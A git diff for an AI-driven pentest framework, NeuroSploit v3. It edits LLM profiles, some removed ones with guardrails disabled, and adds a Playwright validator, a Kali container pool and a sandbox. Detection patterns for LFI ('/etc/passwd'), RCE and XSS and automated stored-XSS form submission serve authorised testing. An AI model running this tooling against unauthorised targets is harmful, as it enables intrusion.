diff --git a/config/config.json b/config/config.json
index d9baad2..ca0e046 100644
--- a/config/config.json
+++ b/config/config.json
@@ -1,35 +1,7 @@
 {
     "llm": {
-        "default_profile": "ollama_whiterabbit",
+        "default_profile": "gemini_pro_default",
         "profiles": {
-            "ollama_whiterabbit": {
-                "provider": "ollama",
-                "model": "lazarevtill/Llama-3-WhiteRabbitNeo-8B-v2.0:q4_0",
-                "api_key": "",
-                "temperature": 0.8,
-                "max_tokens": 4096,
-                "input_token_limit": 8000,
-                "output_token_limit": 4000,
-                "cache_enabled": false,
-                "search_context_level": "high",
-                "pdf_support_enabled": false,
-                "guardrails_enabled": false,
-                "hallucination_mitigation_strategy": null
-            },
-            "ollama_llama3_default": {
-                "provider": "ollama",
-                "model": "llama3:8b",
-                "api_key": "",
-                "temperature": 0.7,
-                "max_tokens": 4096,
-                "input_token_limit": 8000,
-                "output_token_limit": 4000,
-                "cache_enabled": true,
-                "search_context_level": "medium",
-                "pdf_support_enabled": false,
-                "guardrails_enabled": true,
-                "hallucination_mitigation_strategy": null
-            },
             "gemini_pro_default": {
                 "provider": "gemini",
                 "model": "gemini-pro",
@@ -43,52 +15,25 @@
                 "pdf_support_enabled": true,
                 "guardrails_enabled": true,
                 "hallucination_mitigation_strategy": "consistency_check"
-            },
-            "claude_opus_default": {
-                "provider": "claude",
-                "model": "claude-sonnet-4-20250514",
-                "api_key": "${ANTHROPIC_API_KEY}",
-                "temperature": 0.8,
-                "max_tokens": 8192,
-                "input_token_limit": 200000,
-                "output_token_limit": 8192,
-                "cache_enabled": false,
-                "search_context_level": "high",
-                "pdf_support_enabled": false,
-                "guardrails_enabled": false,
-                "hallucination_mitigation_strategy": null
-            },
-            "gpt_4o_default": {
-                "provider": "gpt",
-                "model": "gpt-4o",
-                "api_key": "${OPENAI_API_KEY}",
-                "temperature": 0.7,
-                "max_tokens": 4096,
-                "input_token_limit": 128000,
-                "output_token_limit": 4096,
-                "cache_enabled": true,
-                "search_context_level": "high",
-                "pdf_support_enabled": true,
-                "guardrails_enabled": true,
-                "hallucination_mitigation_strategy": "consistency_check"
-            },
-            "lmstudio_default": {
-                "provider": "lmstudio",
-                "model": "local-model",
-                "api_key": "",
-                "temperature": 0.7,
-                "max_tokens": 4096,
-                "input_token_limit": 32000,
-                "output_token_limit": 4096,
-                "cache_enabled": false,
-                "search_context_level": "medium",
-                "pdf_support_enabled": false,
-                "guardrails_enabled": true,
-                "hallucination_mitigation_strategy": null
             }
         }
     },
     "agent_roles": {
+        "pentest_generalist": {
+            "enabled": true,
+            "tools_allowed": [
+                "nmap",
+                "metasploit",
+                "burpsuite",
+                "sqlmap",
+                "hydra"
+            ],
+            "description": "Performs comprehensive penetration tests across various domains.",
+            "methodology": ["OWASP-WSTG", "PTES", "OWASP-Top10-2021"],
+            "default_prompt": "auto_pentest",
+            "vuln_coverage": 100,
+            "ai_prompts": true
+        },
         "bug_bounty_hunter": {
             "enabled": true,
             "tools_allowed": [
@@ -97,67 +42,11 @@
                 "burpsuite",
                 "sqlmap"
             ],
-            "description": "Focuses on web application vulnerabilities, leveraging recon and exploitation tools."
-        },
-        "blue_team_agent": {
-            "enabled": true,
-            "tools_allowed": [],
-            "description": "Analyzes logs and telemetry for threats, provides defensive strategies."
-        },
-        "exploit_expert": {
-            "enabled": true,
-            "tools_allowed": [
-                "metasploit",
-                "nmap"
-            ],
-            "description": "Devises exploitation strategies and payloads for identified vulnerabilities."
-        },
-        "red_team_agent": {
-            "enabled": true,
-            "tools_allowed": [
-                "nmap",
-                "metasploit",
-                "hydra"
-            ],
-            "description": "Plans and executes simulated attacks to test an organization's defenses."
-        },
-        "replay_attack_specialist": {
-            "enabled": true,
-            "tools_allowed": [
-                "burpsuite"
-            ],
-            "description": "Identifies and leverages replay attack vectors in network traffic or authentication."
-        },
-        "pentest_generalist": {
-            "enabled": true,
-            "tools_allowed": [
-                "nmap",
-                "subfinder",
-                "nuclei",
-                "metasploit",
-                "burpsuite",
-                "sqlmap",
-                "hydra"
-            ],
-            "description": "Performs comprehensive penetration tests across various domains."
-        },
-        "owasp_expert": {
-            "enabled": true,
-            "tools_allowed": [
-                "burpsuite",
-                "sqlmap"
-            ],
-            "description": "Specializes in assessing web applications against OWASP Top 10 vulnerabilities."
-        },
-        "cwe_expert": {
-            "enabled": true,
-            "tools_allowed": [],
-            "description": "Analyzes code and reports for weaknesses based on MITRE CWE Top 25."
-        },
-        "malware_analyst": {
-            "enabled": true,
-            "tools_allowed": [],
-            "description": "Examines malware samples to understand functionality and identify IOCs."
+            "description": "Focuses on web application vulnerabilities with 100 vuln types.",
+            "methodology": ["OWASP-WSTG", "OWASP-Top10-2021"],
+            "default_prompt": "auto_pentest",
+            "vuln_coverage": 100,
+            "ai_prompts": true
         }
     },
     "methodologies": {
@@ -171,20 +60,51 @@
         "nmap": "/usr/bin/nmap",
         "metasploit": "/usr/bin/msfconsole",
         "burpsuite": "/usr/bin/burpsuite",
-        "sqlmap": "/usr/local/bin/sqlmap",
-        "hydra": "/usr/bin/hydra",
-        "nuclei": "/usr/local/bin/nuclei",
-        "nikto": "/usr/bin/nikto",
-        "gobuster": "/usr/bin/gobuster",
-        "ffuf": "/usr/bin/ffuf",
-        "subfinder": "/opt/homebrew/bin/subfinder",
-        "httpx": "/usr/local/bin/httpx",
-        "whatweb": "/usr/bin/whatweb",
-        "curl": "/usr/bin/curl",
-        "wpscan": "/usr/bin/wpscan",
-        "dirsearch": "/usr/local/bin/dirsearch",
-        "wafw00f": "/usr/local/bin/wafw00f",
-        "jq": "/usr/bin/jq"
+        "sqlmap": "/usr/bin/sqlmap",
+        "hydra": "/usr/bin/hydra"
+    },
+    "mcp_servers": {
+        "neurosploit_tools": {
+            "transport": "stdio",
+            "command": "python3",
+            "args": ["-m", "core.mcp_server"],
+            "description": "NeuroSploit pentest tools: screenshots, payload delivery, DNS, port scan, tech detect, subdomain enum, findings, AI prompts, Nuclei scanner, Naabu port scanner, sandbox execution"
+        }
+    },
+    "sandbox": {
+        "enabled": false,
+        "mode": "per_scan",
+        "image": "neurosploit-sandbox:latest",
+        "container_name": "neurosploit-sandbox",
+        "auto_start": false,
+        "kali": {
+            "enabled": true,
+            "image": "neurosploit-kali:latest",
+            "max_concurrent": 5,
+            "container_ttl_minutes": 60,
+            "auto_cleanup_orphans": true
+        },
+        "resources": {
+            "memory_limit": "2g",
+            "cpu_limit": 2.0
+        },
+        "tools": [
+            "nuclei", "naabu", "nmap", "httpx", "subfinder", "katana",
+            "dnsx", "ffuf", "gobuster", "dalfox", "nikto", "sqlmap",
+            "whatweb", "curl", "dig", "whois", "masscan", "dirsearch",
+            "wfuzz", "arjun", "wafw00f", "waybackurls"
+        ],
+        "nuclei": {
+            "rate_limit": 150,
+            "timeout": 600,
+            "severity_filter": "critical,high,medium",
+            "auto_update_templates": true
+        },
+        "naabu": {
+            "rate": 1000,
+            "top_ports": 1000,
+            "timeout": 300
+        }
     },
     "output": {
         "format": "json",
diff --git a/core/browser_validator.py b/core/browser_validator.py
new file mode 100644
index 0000000..3a72d27
--- /dev/null
+++ b/core/browser_validator.py
@@ -0,0 +1,500 @@
+#!/usr/bin/env python3
+"""
+Browser Validator - Playwright-based security finding validation.
+
+Provides browser-based validation for security findings:
+- Navigate to target URLs with payloads
+- Detect security triggers (XSS dialogs, error patterns, etc.)
+- Capture screenshots at each validation step
+- Store evidence in structured per-finding directories
+
+Screenshots are stored at: reports/screenshots/{finding_id}/
+"""
+
+import asyncio
+import base64
+import logging
+from datetime import datetime
+from pathlib import Path
+from typing import Dict, List, Optional
+
+logger = logging.getLogger(__name__)
+
+try:
+    from playwright.async_api import async_playwright, Page, Browser, BrowserContext
+    HAS_PLAYWRIGHT = True
+except ImportError:
+    HAS_PLAYWRIGHT = False
+    logger.debug("Playwright not installed. Browser validation disabled.")
+
+
+# Known security trigger patterns in page content
+SECURITY_TRIGGERS = {
+    'xss': ['<script>alert(', 'onerror=', 'onload=', 'javascript:'],
+    'sqli': ['SQL syntax', 'mysql_fetch', 'pg_query', 'ORA-', 'sqlite3.OperationalError',
+             'SQLSTATE', 'syntax error at or near', 'unclosed quotation mark'],
+    'lfi': ['root:x:0', '/etc/passwd', '[boot loader]', 'Windows\\system.ini'],
+    'rce': ['uid=', 'gid=', 'groups=', 'total ', 'drwx'],
+    'error_disclosure': ['Stack Trace', 'Traceback (most recent call last)',
+                          'Exception in thread', 'Fatal error', 'Parse error'],
+}
+
+
+class BrowserValidator:
+    """Playwright-based browser validation for security findings."""
+
+    def __init__(self, screenshots_dir: str = "reports/screenshots"):
+        self.screenshots_dir = Path(screenshots_dir)
+        self.screenshots_dir.mkdir(parents=True, exist_ok=True)
+        self.browser: Optional['Browser'] = None
+        self._playwright = None
+
+    async def start(self, headless: bool = True):
+        """Launch browser instance."""
+        if not HAS_PLAYWRIGHT:
+            raise RuntimeError(
+                "Playwright not installed. Install with: pip install playwright && python -m playwright install chromium"
+            )
+        self._playwright = await async_playwright().start()
+        self.browser = await self._playwright.chromium.launch(headless=headless)
+        logger.info(f"Browser started (headless={headless})")
+
+    async def stop(self):
+        """Close browser and clean up."""
+        if self.browser:
+            await self.browser.close()
+            self.browser = None
+        if self._playwright:
+            await self._playwright.stop()
+            self._playwright = None
+        logger.info("Browser stopped")
+
+    async def validate_finding(self, finding_id: str, url: str,
+                                payload: Optional[str] = None,
+                                method: str = "GET",
+                                interaction_steps: Optional[List[Dict]] = None,
+                                timeout: int = 30000) -> Dict:
+        """Validate a security finding in a real browser.
+
+        Args:
+            finding_id: Unique identifier for the finding
+            url: Target URL (may include payload in query params)
+            payload: Optional payload description for logging
+            method: HTTP method (currently GET-based navigation)
+            interaction_steps: Optional list of browser interaction steps
+            timeout: Navigation timeout in milliseconds
+
+        Returns:
+            Dict with validation result, screenshots, evidence
+        """
+        if not self.browser:
+            return {"error": "Browser not started. Call start() first."}
+
+        finding_dir = self.screenshots_dir / finding_id
+        finding_dir.mkdir(parents=True, exist_ok=True)
+
+        validation = {
+            "finding_id": finding_id,
+            "url": url,
+            "payload": payload,
+            "timestamp": datetime.now().isoformat(),
+            "validated": False,
+            "screenshots": [],
+            "console_logs": [],
+            "dialog_detected": False,
+            "dialog_messages": [],
+            "triggers_found": [],
+            "evidence": "",
+            "page_title": "",
+            "status_code": None,
+            "error": None
+        }
+
+        context = await self.browser.new_context(
+            ignore_https_errors=True,
+            user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
+                       "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
+        )
+        page = await context.new_page()
+
+        # Capture console messages
+        console_msgs = []
+        page.on("console", lambda msg: console_msgs.append({
+            "type": msg.type, "text": msg.text
+        }))
+
+        # Capture JavaScript dialogs (XSS alert/prompt/confirm detection)
+        dialog_messages = []
+
+        async def handle_dialog(dialog):
+            dialog_messages.append({
+                "type": dialog.type,
+                "message": dialog.message
+            })
+            await dialog.dismiss()
+
+        page.on("dialog", handle_dialog)
+
+        # Track response status
+        response_status = [None]
+
+        def on_response(response):
+            if response.url == url or response.url.rstrip('/') == url.rstrip('/'):
+                response_status[0] = response.status
+
+        page.on("response", on_response)
+
+        try:
+            # Navigate to the URL
+            response = await page.goto(url, wait_until="networkidle", timeout=timeout)
+            if response:
+                validation["status_code"] = response.status
+
+            validation["page_title"] = await page.title()
+
+            # Take initial screenshot
+            ss_path = finding_dir / "01_initial.png"
+            await page.screenshot(path=str(ss_path), full_page=True)
+            validation["screenshots"].append(str(ss_path))
+
+            # Execute interaction steps if provided
+            if interaction_steps:
+                for i, step in enumerate(interaction_steps):
+                    step_name = step.get('name', f'step_{i+2}')
+                    try:
+                        await self._execute_step(page, step)
+                        await page.wait_for_timeout(500)  # Brief pause
+                        ss_path = finding_dir / f"{i+2:02d}_{step_name}.png"
+                        await page.screenshot(path=str(ss_path))
+                        validation["screenshots"].append(str(ss_path))
+                    except Exception as e:
+                        logger.warning(f"Interaction step '{step_name}' failed: {e}")
+
+            # Check for dialog detection (XSS)
+            if dialog_messages:
+                validation["validated"] = True
+                validation["dialog_detected"] = True
+                validation["dialog_messages"] = dialog_messages
+                validation["evidence"] = f"JavaScript dialog triggered: {dialog_messages[0]['message']}"
+
+                ss_path = finding_dir / "xss_dialog_detected.png"
+                await page.screenshot(path=str(ss_path))
+                validation["screenshots"].append(str(ss_path))
+
+            # Check for security triggers in page content
+            content = await page.content()
+            for trigger_type, patterns in SECURITY_TRIGGERS.items():
+                for pattern in patterns:
+                    if pattern.lower() in content.lower():
+                        validation["triggers_found"].append({
+                            "type": trigger_type,
+                            "pattern": pattern
+                        })
+
+            if validation["triggers_found"] and not validation["validated"]:
+                validation["validated"] = True
+                first_trigger = validation["triggers_found"][0]
+                validation["evidence"] = (
+                    f"Security trigger detected: {first_trigger['type']} "
+                    f"(pattern: {first_trigger['pattern']})"
+                )
+
+                ss_path = finding_dir / "trigger_detected.png"
+                await page.screenshot(path=str(ss_path))
+                validation["screenshots"].append(str(ss_path))
+
+            # Check console for errors that might indicate vulnerabilities
+            error_msgs = [m for m in console_msgs if m["type"] in ("error", "warning")]
+            if error_msgs:
+                validation["console_logs"] = console_msgs
+
+        except Exception as e:
+            validation["error"] = str(e)
+            logger.error(f"Browser validation error for {finding_id}: {e}")
+
+            try:
+                ss_path = finding_dir / "error.png"
+                await page.screenshot(path=str(ss_path))
+                validation["screenshots"].append(str(ss_path))
+            except Exception:
+                pass
+
+        finally:
+            await context.close()
+
+        return validation
+
+    async def verify_stored_xss(
+        self,
+        finding_id: str,
+        form_url: str,
+        form_data: Dict[str, str],
+        display_url: str,
+        submit_selector: str = "button[type=submit], input[type=submit], button:not([type])",
+        timeout: int = 30000,
+    ) -> Dict:
+        """Two-phase stored XSS verification using browser.
+
+        Phase 1: Navigate to form page, fill fields with payload, submit.
+        Phase 2: Navigate to display page, check for dialog (alert/confirm/prompt).
+
+        Args:
+            finding_id: Unique ID for this verification attempt
+            form_url: URL containing the form to submit
+            form_data: Dict mapping CSS selectors to values (payload in relevant fields)
+            display_url: URL where stored content is displayed
+            submit_selector: CSS selector(s) for submit button (comma-separated)
+            timeout: Navigation timeout in ms
+
+        Returns:
+            Dict with verification results, dialog detection, screenshots
+        """
+        if not self.browser:
+            return {"error": "Browser not started. Call start() first."}
+
+        finding_dir = self.screenshots_dir / finding_id
+        finding_dir.mkdir(parents=True, exist_ok=True)
+
+        result = {
+            "finding_id": finding_id,
+            "form_url": form_url,
+            "display_url": display_url,
+            "timestamp": datetime.now().isoformat(),
+            "phase1_success": False,
+            "phase2_success": False,
+            "xss_confirmed": False,
+            "dialog_detected": False,
+            "dialog_messages": [],
+            "screenshots": [],
+            "evidence": "",
+            "error": None,
+        }
+
+        context = await self.browser.new_context(
+            ignore_https_errors=True,
+            user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
+                       "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
+        )
+        page = await context.new_page()
+
+        dialog_messages = []
+
+        async def handle_dialog(dialog):
+            dialog_messages.append({
+                "type": dialog.type,
+                "message": dialog.message,
+                "phase": "phase2" if result["phase1_success"] else "phase1"
+            })
+            await dialog.dismiss()
+
+        page.on("dialog", handle_dialog)
+
+        try:
+            # === PHASE 1: Navigate to form and submit payload ===
+            await page.goto(form_url, wait_until="networkidle", timeout=timeout)
+
+            ss_path = finding_dir / "01_form_page.png"
+            await page.screenshot(path=str(ss_path), full_page=True)
+            result["screenshots"].append(str(ss_path))
+
+            # Fill form fields
+            for selector, value in form_data.items():
+                try:
+                    await page.fill(selector, value)
+                except Exception:
+                    try:
+                        await page.type(selector, value)
+                    except Exception as fill_err:
+                        logger.warning(f"Could not fill {selector}: {fill_err}")
+
+            ss_path = finding_dir / "02_form_filled.png"
+            await page.screenshot(path=str(ss_path))
+            result["screenshots"].append(str(ss_path))
+
+            # Submit
+            submitted = False
+            for sel in submit_selector.split(","):
+                sel = sel.strip()
+                try:
+                    btn = await page.query_selector(sel)
+                    if btn:
+                        await btn.click()
+                        submitted = True
+                        break
+                except Exception:
+                    continue
+
+            if not submitted and form_data:
+                # Fallback: press Enter on last filled field
+                last_sel = list(form_data.keys())[-1]
+                try:
+                    await page.press(last_sel, "Enter")
+                except Exception:
+                    pass
+
+            try:
+                await page.wait_for_load_state("networkidle", timeout=10000)
+            except Exception:
+                await page.wait_for_timeout(3000)
+
+            ss_path = finding_dir / "03_after_submit.png"
+            await page.screenshot(path=str(ss_path), full_page=True)
+            result["screenshots"].append(str(ss_path))
+            result["phase1_success"] = True
+
+            # === PHASE 2: Navigate to display page ===
+            await page.goto(display_url, wait_until="networkidle", timeout=timeout)
+            await page.wait_for_timeout(1000)
+
+            ss_path = finding_dir / "04_display_page.png"
+            await page.screenshot(path=str(ss_path), full_page=True)
+            result["screenshots"].append(str(ss_path))
+
+            # Check for dialogs triggered on display page
+            if dialog_messages:
+                phase2_dialogs = [d for d in dialog_messages if d.get("phase") == "phase2"]
+                if phase2_dialogs:
+                    result["xss_confirmed"] = True
+                    result["dialog_detected"] = True
+                    result["dialog_messages"] = dialog_messages
+                    result["evidence"] = (
+                        f"Stored XSS CONFIRMED: JavaScript dialog triggered on display page. "
+                        f"Dialog: {phase2_dialogs[0]['type']}('{phase2_dialogs[0]['message']}')"
+                    )
+                    result["phase2_success"] = True
+
+                    ss_path = finding_dir / "05_xss_confirmed.png"
+                    await page.screenshot(path=str(ss_path))
+                    result["screenshots"].append(str(ss_path))
+                else:
+                    result["evidence"] = (
+                        "Dialog triggered during form submission (phase1), not on display page."
+                    )
+
+            # Content-based fallback if no dialog
+            if not result["xss_confirmed"]:
+                content = await page.content()
+                for _, payload_val in form_data.items():
+                    if payload_val in content:
+                        payload_lower = payload_val.lower()
+                        for tag in ["<script", "onerror=", "onload=", "<svg", "<img",
+                                    "onfocus=", "onclick=", "ontoggle"]:
+                            if tag in payload_lower:
+                                result["phase2_success"] = True
+                                result["evidence"] = (
+                                    f"Stored payload with '{tag}' found unescaped on display page. "
+                                    f"Dialog may be blocked by CSP."
+                                )
+                                break
+                        break
+
+        except Exception as e:
+            result["error"] = str(e)
+            logger.error(f"Stored XSS verification error: {e}")
+            try:
+                ss_path = finding_dir / "error.png"
+                await page.screenshot(path=str(ss_path))
+                result["screenshots"].append(str(ss_path))
+            except Exception:
+                pass
+        finally:
+            await context.close()
+
+        return result
+
+    async def _execute_step(self, page: 'Page', step: Dict):
+        """Execute a single browser interaction step."""
+        action = step.get("action", "")
+
+        if action == "click":
+            await page.click(step["selector"])
+        elif action == "fill":
+            await page.fill(step["selector"], step["value"])
+        elif action == "type":
+            await page.type(step["selector"], step["value"])
+        elif action == "submit":
+            selector = step.get("selector", "button[type=submit]")
+            await page.click(selector)
+        elif action == "wait":
+            await page.wait_for_timeout(step.get("ms", 2000))
+        elif action == "navigate":
+            await page.goto(step["url"], wait_until="networkidle")
+        elif action == "select":
+            await page.select_option(step["selector"], step["value"])
+        elif action == "check":
+            await page.check(step["selector"])
+        elif action == "press":
+            await page.press(step.get("selector", "body"), step["key"])
+        else:
+            logger.warning(f"Unknown interaction action: {action}")
+
+    async def batch_validate(self, findings: List[Dict],
+                              headless: bool = True) -> List[Dict]:
+        """Validate multiple findings in sequence.
+
+        Args:
+            findings: List of dicts with 'finding_id', 'url', and optional 'payload'
+            headless: Run browser in headless mode
+
+        Returns:
+            List of validation results
+        """
+        results = []
+        await self.start(headless=headless)
+        try:
+            for finding in findings:
+                result = await self.validate_finding(
+                    finding_id=finding['finding_id'],
+                    url=finding['url'],
+                    payload=finding.get('payload'),
+                    interaction_steps=finding.get('interaction_steps')
+                )
+                results.append(result)
+        finally:
+            await self.stop()
+        return results
+
+
+def validate_finding_sync(finding_id: str, url: str,
+                           payload: str = None,
+                           screenshots_dir: str = "reports/screenshots",
+                           headless: bool = True) -> Dict:
+    """Synchronous wrapper for browser validation.
+
+    For use in synchronous code paths (e.g., BaseAgent).
+    """
+    if not HAS_PLAYWRIGHT:
+        return {
+            "finding_id": finding_id,
+            "skipped": True,
+            "reason": "Playwright not installed"
+        }
+
+    async def _run():
+        validator = BrowserValidator(screenshots_dir=screenshots_dir)
+        await validator.start(headless=headless)
+        try:
+            return await validator.validate_finding(finding_id, url, payload)
+        finally:
+            await validator.stop()
+
+    try:
+        return asyncio.run(_run())
+    except RuntimeError:
+        # Already in an async context - use nest_asyncio or skip
+        logger.warning("Cannot run sync validation inside async context")
+        return {
+            "finding_id": finding_id,
+            "skipped": True,
+            "reason": "Async context conflict"
+        }
+
+
+def embed_screenshot(filepath: str) -> str:
+    """Convert a screenshot file to a base64 data URI for HTML embedding."""
+    path = Path(filepath)
+    if not path.exists():
+        return ""
+    with open(path, 'rb') as f:
+        data = base64.b64encode(f.read()).decode('ascii')
+    return f"data:image/png;base64,{data}"
diff --git a/core/container_pool.py b/core/container_pool.py
new file mode 100644
index 0000000..49355ea
--- /dev/null
+++ b/core/container_pool.py
@@ -0,0 +1,206 @@
+"""
+NeuroSploit v3 - Container Pool
+
+Global coordinator for per-scan Kali Linux containers.
+Tracks all running sandbox containers, enforces max concurrent limits,
+handles lifecycle management and orphan cleanup.
+"""
+
+import asyncio
+import json
+import logging
+import threading
+from datetime import datetime, timedelta
+from typing import Dict, Optional
+
+logger = logging.getLogger(__name__)
+
+try:
+    import docker
+    from docker.errors import NotFound
+    HAS_DOCKER = True
+except ImportError:
+    HAS_DOCKER = False
+
+from core.kali_sandbox import KaliSandbox
+
+
+class ContainerPool:
+    """Global pool managing per-scan KaliSandbox instances.
+
+    Thread-safe. One pool per process. Enforces resource limits.
+    """
+
+    def __init__(
+        self,
+        image: str = "neurosploit-kali:latest",
+        max_concurrent: int = 5,
+        memory_limit: str = "2g",
+        cpu_limit: float = 2.0,
+        container_ttl_minutes: int = 60,
+    ):
+        self.image = image
+        self.max_concurrent = max_concurrent
+        self.memory_limit = memory_limit
+        self.cpu_limit = cpu_limit
+        self.container_ttl = timedelta(minutes=container_ttl_minutes)
+
+        self._sandboxes: Dict[str, KaliSandbox] = {}
+        self._lock = asyncio.Lock()
+
+    @classmethod
+    def from_config(cls) -> "ContainerPool":
+        """Create pool from config/config.json sandbox section."""
+        try:
+            with open("config/config.json") as f:
+                cfg = json.load(f)
+            sandbox_cfg = cfg.get("sandbox", {})
+            kali_cfg = sandbox_cfg.get("kali", {})
+            resources = sandbox_cfg.get("resources", {})
+
+            return cls(
+                image=kali_cfg.get("image", "neurosploit-kali:latest"),
+                max_concurrent=kali_cfg.get("max_concurrent", 5),
+                memory_limit=resources.get("memory_limit", "2g"),
+                cpu_limit=resources.get("cpu_limit", 2.0),
+                container_ttl_minutes=kali_cfg.get("container_ttl_minutes", 60),
+            )
+        except Exception as e:
+            logger.warning(f"Could not load pool config, using defaults: {e}")
+            return cls()
+
+    async def get_or_create(self, scan_id: str) -> KaliSandbox:
+        """Get existing sandbox for scan_id, or create a new one.
+
+        Raises RuntimeError if max_concurrent limit reached.
+        """
+        async with self._lock:
+            # Return existing
+            if scan_id in self._sandboxes:
+                sb = self._sandboxes[scan_id]
+                if sb.is_available:
+                    return sb
+                else:
+                    del self._sandboxes[scan_id]
+
+            # Check limit
+            active = sum(1 for sb in self._sandboxes.values() if sb.is_available)
+            if active >= self.max_concurrent:
+                raise RuntimeError(
+                    f"Max concurrent containers ({self.max_concurrent}) reached. "
+                    f"Active scans: {list(self._sandboxes.keys())}"
+                )
+
+            # Create new
+            sb = KaliSandbox(
+                scan_id=scan_id,
+                image=self.image,
+                memory_limit=self.memory_limit,
+                cpu_limit=self.cpu_limit,
+            )
+            ok, msg = await sb.initialize()
+            if not ok:
+                raise RuntimeError(f"Failed to create Kali sandbox: {msg}")
+
+            self._sandboxes[scan_id] = sb
+            logger.info(
+                f"Pool: created container for scan {scan_id} "
+                f"({active + 1}/{self.max_concurrent} active)"
+            )
+            return sb
+
+    async def destroy(self, scan_id: str):
+        """Stop and remove the container for a specific scan."""
+        async with self._lock:
+            sb = self._sandboxes.pop(scan_id, None)
+        if sb:
+            await sb.stop()
+            logger.info(f"Pool: destroyed container for scan {scan_id}")
+
+    async def cleanup_all(self):
+        """Destroy all managed containers (shutdown hook)."""
+        async with self._lock:
+            scan_ids = list(self._sandboxes.keys())
+        for sid in scan_ids:
+            await self.destroy(sid)
+        logger.info("Pool: all containers destroyed")
+
+    async def cleanup_orphans(self):
+        """Find and remove neurosploit-* containers not tracked by this pool."""
+        if not HAS_DOCKER:
+            return
+
+        try:
+            client = docker.from_env()
+            containers = client.containers.list(
+                all=True,
+                filters={"label": "neurosploit.type=kali-sandbox"},
+            )
+            async with self._lock:
+                tracked = set(self._sandboxes.keys())
+
+            removed = 0
+            for c in containers:
+                scan_id = c.labels.get("neurosploit.scan_id", "")
+                if scan_id not in tracked:
+                    try:
+                        c.stop(timeout=5)
+                    except Exception:
+                        pass
+                    try:
+                        c.remove(force=True)
+                        removed += 1
+                        logger.info(f"Pool: removed orphan container {c.name}")
+                    except Exception:
+                        pass
+
+            if removed:
+                logger.info(f"Pool: cleaned up {removed} orphan containers")
+        except Exception as e:
+            logger.warning(f"Pool: orphan cleanup failed: {e}")
+
+    async def cleanup_expired(self):
+        """Remove containers that have exceeded their TTL."""
+        now = datetime.utcnow()
+        async with self._lock:
+            expired = [
+                sid for sid, sb in self._sandboxes.items()
+                if sb._created_at and (now - sb._created_at) > self.container_ttl
+            ]
+        for sid in expired:
+            logger.warning(f"Pool: container for scan {sid} exceeded TTL, destroying")
+            await self.destroy(sid)
+
+    def list_sandboxes(self) -> Dict[str, Dict]:
+        """List all tracked sandboxes with status."""
+        result = {}
+        for sid, sb in self._sandboxes.items():
+            result[sid] = {
+                "scan_id": sid,
+                "container_name": sb.container_name,
+                "available": sb.is_available,
+                "installed_tools": sorted(sb._installed_tools),
+                "created_at": sb._created_at.isoformat() if sb._created_at else None,
+            }
+        return result
+
+    @property
+    def active_count(self) -> int:
+        return sum(1 for sb in self._sandboxes.values() if sb.is_available)
+
+
+# ---------------------------------------------------------------------------
+# Global singleton pool
+# ---------------------------------------------------------------------------
+_pool: Optional[ContainerPool] = None
+_pool_lock = threading.Lock()
+
+
+def get_pool() -> ContainerPool:
+    """Get or create the global container pool."""
+    global _pool
+    if _pool is None:
+        with _pool_lock:
+            if _pool is None:
+                _pool = ContainerPool.from_config()
+    return _pool
diff --git a/core/kali_sandbox.py b/core/kali_sandbox.py
new file mode 100644
index 0000000..653531d
--- /dev/null
+++ b/core/kali_sandbox.py
@@ -0,0 +1,392 @@
+"""
+NeuroSploit v3 - Kali Linux Per-Scan Sandbox
+
+Each scan gets its own Docker container based on kalilinux/kali-rolling.
+Tools installed on-demand the first time they are requested.
+Container destroyed when scan completes.
+"""
+
+import asyncio
+import json
+import logging
+import shlex
+import time
+from datetime import datetime
+from typing import Dict, Any, Optional, List, Tuple, Set
+
+logger = logging.getLogger(__name__)
+
+try:
+    import docker
+    from docker.errors import DockerException, NotFound, APIError
+    HAS_DOCKER = True
+except ImportError:
+    HAS_DOCKER = False
+
+from core.sandbox_manager import (
+    BaseSandbox, SandboxResult,
+    parse_nuclei_jsonl, parse_naabu_output,
+)
+from core.tool_registry import ToolRegistry
+
+
+class KaliSandbox(BaseSandbox):
+    """Per-scan Docker container based on Kali Linux.
+    
+    Lifecycle: create -> install tools on demand -> execute -> destroy.
+    Each instance owns exactly one container named 'neurosploit-{scan_id}'.
+    """
+
+    DEFAULT_TIMEOUT = 300
+    MAX_OUTPUT = 2 * 1024 * 1024  # 2MB
+
+    def __init__(
+        self,
+        scan_id: str,
+        image: str = "neurosploit-kali:latest",
+        memory_limit: str = "2g",
+        cpu_limit: float = 2.0,
+        network_mode: str = "bridge",
+    ):
+        self.scan_id = scan_id
+        self.container_name = f"neurosploit-{scan_id}"
+        self.image = image
+        self.memory_limit = memory_limit
+        self.cpu_limit = cpu_limit
+        self.network_mode = network_mode
+
+        self._client = None
+        self._container = None
+        self._available = False
+        self._installed_tools: Set[str] = set()
+        self._tool_registry = ToolRegistry()
+        self._created_at: Optional[datetime] = None
+
+    async def initialize(self) -> Tuple[bool, str]:
+        """Create and start a new Kali container for this scan."""
+        if not HAS_DOCKER:
+            return False, "Docker SDK not installed"
+
+        try:
+            self._client = docker.from_env()
+            self._client.ping()
+        except Exception as e:
+            return False, f"Docker not available: {e}"
+
+        # Check if container already exists (resume after crash)
+        try:
+            existing = self._client.containers.get(self.container_name)
+            if existing.status == "running":
+                self._container = existing
+                self._available = True
+                self._created_at = datetime.utcnow()
+                return True, f"Resumed existing container {self.container_name}"
+            else:
+                existing.remove(force=True)
+        except NotFound:
+            pass
+
+        # Check image exists
+        try:
+            self._client.images.get(self.image)
+        except NotFound:
+            return False, (
+                f"Kali sandbox image '{self.image}' not found. "
+                "Build with: docker build -f docker/Dockerfile.kali -t neurosploit-kali:latest docker/"
+            )
+
+        # Create container
+        try:
+            cpu_quota = int(self.cpu_limit * 100000)
+            self._container = self._client.containers.run(
+                self.image,
+                command="sleep infinity",
+                name=self.container_name,
+                detach=True,
+                network_mode=self.network_mode,
+                mem_limit=self.memory_limit,
+                cpu_period=100000,
+                cpu_quota=cpu_quota,
+                cap_add=["NET_RAW", "NET_ADMIN"],
+                security_opt=["no-new-privileges:true"],
+                labels={
+                    "neurosploit.scan_id": self.scan_id,
+                    "neurosploit.type": "kali-sandbox",
+                },
+            )
+            self._available = True
+            self._created_at = datetime.utcnow()
+            logger.info(f"Created Kali container {self.container_name} for scan {self.scan_id}")
+            return True, f"Container {self.container_name} started"
+        except Exception as e:
+            return False, f"Failed to create container: {e}"
+
+    @property
+    def is_available(self) -> bool:
